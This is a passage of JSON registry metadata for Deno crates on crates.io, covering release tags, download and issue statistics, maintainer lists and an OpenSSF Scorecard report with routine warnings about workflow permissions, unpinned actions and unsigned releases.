":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T12:39:36.264Z","dependent_packages_count":0,"downloads":94473,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":94.79779564100438,"dependent_repos_count":21.322097455871386,"dependent_packages_count":28.234544625839064,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":48.11814590757161},"purl":"pkg:cargo/deno_subprocess_windows","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_subprocess_windows","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_subprocess_windows","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_subprocess_windows/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_subprocess_windows/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_subprocess_windows/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_subprocess_windows/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_subprocess_windows/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_subprocess_windows/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_subprocess_windows/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-06-12T13:02:31.796Z","updated_at":"2025-06-12T13:02:31.796Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-06-12T13:02:32.105Z","updated_at":"2025-06-12T13:02:32.105Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":14652559,"name":"deno_cli_parser","ecosystem":"cargo","description":"Zero-cost CLI argument parser for the Deno CLI","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":8,"first_release_published_at":"2026-06-18T21:04:25.237Z","latest_release_published_at":"2026-08-27T15:22:52.025Z","latest_release_number":"0.8.0","last_synced_at":"2026-09-07T22:57:02.972Z","created_at":"2026-06-18T21:19:29.293Z","updated_at":"2026-09-07T22:57:02.972Z","registry_url":"https://crates.io/crates/deno_cli_parser/","install_command":"cargo install deno_cli_parser","documentation_url":"https://docs.rs/deno_cli_parser/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using 